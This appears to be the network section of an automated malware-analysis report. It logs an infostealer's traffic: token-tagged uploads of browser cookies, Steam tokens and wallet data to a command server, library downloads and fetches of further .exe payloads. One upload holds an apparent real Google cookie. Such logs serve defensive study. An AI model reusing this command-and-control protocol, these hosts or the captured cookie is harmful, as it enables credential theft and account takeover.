Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFIEHDHIIIECAAKECFHHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 33 33 33 39 64 63 34 65 64 33 32 31 39 64 30 32 34 38 62 63 66 34 63 64 38 61 66 64 65 32 65 39 35 66 39 35 62 62 37 66 64 31 39 65 32 30 30 38 66 62 38 33 65 36 31 30 30 61 33 62 32 63 39 38 61 32 61 66 64 30 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 2d 2d 0d 0a Data Ascii: ------DBFIEHDHIIIECAAKECFHContent-Disposition: form-data; name="token"813339dc4ed3219d0248bcf4cd8afde2e95f95bb7fd19e2008fb83e6100a3b2c98a2afd0------DBFIEHDHIIIECAAKECFHContent-Disposition: form-data; name="message"browsers------DBFIEHDHIIIECAAKECFH--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJDGDHIDBGIECBGHJDBHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 33 33 33 39 64 63 34 65 64 33 32 31 39 64 30 32 34 38 62 63 66 34 63 64 38 61 66 64 65 32 65 39 35 66 39 35 62 62 37 66 64 31 39 65 32 30 30 38 66 62 38 33 65 36 31 30 30 61 33 62 32 63 39 38 61 32 61 66 64 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="token"813339dc4ed3219d0248bcf4cd8afde2e95f95bb7fd19e2008fb83e6100a3b2c98a2afd0------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="message"plugins------KKJDGDHIDBGIECBGHJDB--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJKKKFCFHCFIECBGDHIHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 33 33 33 39 64 63 34 65 64 33 32 31 39 64 30 32 34 38 62 63 66 34 63 64 38 61 66 64 65 32 65 39 35 66 39 35 62 62 37 66 64 31 39 65 32 30 30 38 66 62 38 33 65 36 31 30 30 61 33 62 32 63 39 38 61 32 61 66 64 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 2d 2d 0d 0a Data Ascii: ------GIJKKKFCFHCFIECBGDHIContent-Disposition: form-data; name="token"813339dc4ed3219d0248bcf4cd8afde2e95f95bb7fd19e2008fb83e6100a3b2c98a2afd0------GIJKKKFCFHCFIECBGDHIContent-Disposition: form-data; name="message"fplugins------GIJKKKFCFHCFIECBGDHI--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBGIIDBKEBFBGCAEBAKHost: 46.8.231.109Content-Length: 8339Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFIEHDHIIIECAAKECFHHost: 46.8.231.109Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 33 33 33 39 64 63 34 65 64 33 32 31 39 64 30 32 34 38 62 63 66 34 63 64 38 61 66 64 65 32 65 39 35 66 39 35 62 62 37 66 64 31 39 65 32 30 30 38 66 62 38 33 65 36 31 30 30 61 33 62 32 63 39 38 61 32 61 66 64 30 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4e 7a 59 31 4e 44 45 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 55 74 4d 44 63 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 31 4e 7a 51 77 43 55 35 4a 52 41 6b 31 4d 54 45 39 62 6b 35 68 5a 48 46 58 4f 58 56 55 59 31 6b 77 54 31 41 32 53 54 4e 68 5a 6d 35 79 4e 7a 46 76 4e 6b 56 36 59 56 6c 4d 63 32 52 77 56 7a 52 56 52 56 6c 4f 4d 33 5a 5a 63 56 39 79 59 6c 4a 79 54 6b 5a 34 54 54 46 71 62 33 70 51 52 33 56 6f 61 6b 39 53 51 6c 70 4c 53 30 31 36 4d 6e 52 6b 52 48 42 57 5a 54 64 6b 54 6e 56 55 56 33 41 30 51 33 6c 4c 4c 58 70 30 4e 55 6c 7a 4e 6e 64 57 52 57 78 32 5a 56 64 42 5a 6b 74 52 5a 33 64 4f 53 6d 6c 4c 53 33 52 59 53 45 4e 44 51 32 31 79 62 47 64 36 57 6c 52 73 4e 55 4e 70 53 32 70 55 5a 55 45 79 61 56 46 78 5a 6a 5a 36 62 46 4a 4c 4d 6d 67 34 64 32 63 78 61 46 5a 77 53 58 4e 58 63 32 46 4c 63 57 46 58 53 6e 6c 49 54 56 42 47 4d 30 70 42 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 2d 2d 0d 0a Data Ascii: ------DBFIEHDHIIIECAAKECFHContent-Disposition: form-data; name="token"813339dc4ed3219d0248bcf4cd8afde2e95f95bb7fd19e2008fb83e6100a3b2c98a2afd0------DBFIEHDHIIIECAAKECFHContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------DBFIEHDHIIIECAAKECFHContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwNzY1NDEJMVBfSkFSCTIwMjMtMTAtMDUtMDcKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjk1NzQwCU5JRAk1MTE9bk5hZHFXOXVUY1kwT1A2STNhZm5yNzFvNkV6YVl
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCBKFBGIIIECAAAKFCHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 42 4b 46 42 47 49 49 49 45 43 41 41 41 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 33 33 33 39 64 63 34 65 64 33 32 31 39 64 30 32 34 38 62 63 66 34 63 64 38 61 66 64 65 32 65 39 35 66 39 35 62 62 37 66 64 31 39 65 32 30 30 38 66 62 38 33 65 36 31 30 30 61 33 62 32 63 39 38 61 32 61 66 64 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 42 4b 46 42 47 49 49 49 45 43 41 41 41 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 42 4b 46 42 47 49 49 49 45 43 41 41 41 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 42 4b 46 42 47 49 49 49 45 43 41 41 41 4b 46 43 2d 2d 0d 0a Data Ascii: ------CBGCBKFBGIIIECAAAKFCContent-Disposition: form-data; name="token"813339dc4ed3219d0248bcf4cd8afde2e95f95bb7fd19e2008fb83e6100a3b2c98a2afd0------CBGCBKFBGIIIECAAAKFCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CBGCBKFBGIIIECAAAKFCContent-Disposition: form-data; name="file"------CBGCBKFBGIIIECAAAKFC--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGCFHIDAKECFHIEBFCGIHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 33 33 33 39 64 63 34 65 64 33 32 31 39 64 30 32 34 38 62 63 66 34 63 64 38 61 66 64 65 32 65 39 35 66 39 35 62 62 37 66 64 31 39 65 32 30 30 38 66 62 38 33 65 36 31 30 30 61 33 62 32 63 39 38 61 32 61 66 64 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 49 2d 2d 0d 0a Data Ascii: ------DGCFHIDAKECFHIEBFCGIContent-Disposition: form-data; name="token"813339dc4ed3219d0248bcf4cd8afde2e95f95bb7fd19e2008fb83e6100a3b2c98a2afd0------DGCFHIDAKECFHIEBFCGIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------DGCFHIDAKECFHIEBFCGIContent-Disposition: form-data; name="file"------DGCFHIDAKECFHIEBFCGI--
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDHIEBAAKJDHIECAAFHHost: 46.8.231.109Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDBFIIECBGDGDGDHCAKHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 33 33 33 39 64 63 34 65 64 33 32 31 39 64 30 32 34 38 62 63 66 34 63 64 38 61 66 64 65 32 65 39 35 66 39 35 62 62 37 66 64 31 39 65 32 30 30 38 66 62 38 33 65 36 31 30 30 61 33 62 32 63 39 38 61 32 61 66 64 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 2d 2d 0d 0a Data Ascii: ------EGDBFIIECBGDGDGDHCAKContent-Disposition: form-data; name="token"813339dc4ed3219d0248bcf4cd8afde2e95f95bb7fd19e2008fb83e6100a3b2c98a2afd0------EGDBFIIECBGDGDGDHCAKContent-Disposition: form-data; name="message"wallets------EGDBFIIECBGDGDGDHCAK--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGCGHCGHCBFHJJKKJEHHost: 46.8.231.109Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 33 33 33 39 64 63 34 65 64 33 32 31 39 64 30 32 34 38 62 63 66 34 63 64 38 61 66 64 65 32 65 39 35 66 39 35 62 62 37 66 64 31 39 65 32 30 30 38 66 62 38 33 65 36 31 30 30 61 33 62 32 63 39 38 61 32 61 66 64 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 48 2d 2d 0d 0a Data Ascii: ------JDGCGHCGHCBFHJJKKJEHContent-Disposition: form-data; name="token"813339dc4ed3219d0248bcf4cd8afde2e95f95bb7fd19e2008fb83e6100a3b2c98a2afd0------JDGCGHCGHCBFHJJKKJEHContent-Disposition: form-data; name="message"files------JDGCGHCGHCBFHJJKKJEH--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFCFHJDBKJKEBFHJEHIHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 33 33 33 39 64 63 34 65 64 33 32 31 39 64 30 32 34 38 62 63 66 34 63 64 38 61 66 64 65 32 65 39 35 66 39 35 62 62 37 66 64 31 39 65 32 30 30 38 66 62 38 33 65 36 31 30 30 61 33 62 32 63 39 38 61 32 61 66 64 30 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 2d 2d 0d 0a Data Ascii: ------HCFCFHJDBKJKEBFHJEHIContent-Disposition: form-data; name="token"813339dc4ed3219d0248bcf4cd8afde2e95f95bb7fd19e2008fb83e6100a3b2c98a2afd0------HCFCFHJDBKJKEBFHJEHIContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------HCFCFHJDBKJKEBFHJEHIContent-Disposition: form-data; name="file"------HCFCFHJDBKJKEBFHJEHI--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIIJJJKEGIDGCBAFIJHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 33 33 33 39 64 63 34 65 64 33 32 31 39 64 30 32 34 38 62 63 66 34 63 64 38 61 66 64 65 32 65 39 35 66 39 35 62 62 37 66 64 31 39 65 32 30 30 38 66 62 38 33 65 36 31 30 30 61 33 62 32 63 39 38 61 32 61 66 64 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 2d 2d 0d 0a Data Ascii: ------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="token"813339dc4ed3219d0248bcf4cd8afde2e95f95bb7fd19e2008fb83e6100a3b2c98a2afd0------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="message"ybncbhylepme------IDHIIJJJKEGIDGCBAFIJ--
Source: global traffic	HTTP traffic detected: GET /prog/66cf818156193_ldjfnsfd.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66cf75d3791d7_vrewqgq.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJJDBAEHIJKJKEBFIEGHHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 33 33 33 39 64 63 34 65 64 33 32 31 39 64 30 32 34 38 62 63 66 34 63 64 38 61 66 64 65 32 65 39 35 66 39 35 62 62 37 66 64 31 39 65 32 30 30 38 66 62 38 33 65 36 31 30 30 61 33 62 32 63 39 38 61 32 61 66 64 30 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 2d 2d 0d 0a Data Ascii: ------IJJDBAEHIJKJKEBFIEGHContent-Disposition: form-data; name="token"813339dc4ed3219d0248bcf4cd8afde2e95f95bb7fd19e2008fb83e6100a3b2c98a2afd0------IJJDBAEHIJKJKEBFIEGHContent-Disposition: form-data; name="message"wkkjqaiaxkhb------IJJDBAEHIJKJKEBFIEGH--
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHDHIDAEHCFHJJJJECAHost: 147.45.68.138Content-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 44 31 45 33 34 31 42 31 37 41 32 39 37 34 31 36 34 32 35 38 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 2d 2d 0d 0a Data Ascii: ------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="hwid"07D1E341B17A2974164258-a33c7340-61ca------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------KEHDHIDAEHCFHJJJJECA--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGHJKJKKJDHIDHJKJDBHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 42 2d 2d 0d 0a Data Ascii: ------AEGHJKJKKJDHIDHJKJDBContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------AEGHJKJKKJDHIDHJKJDBContent-Disposition: form-data; 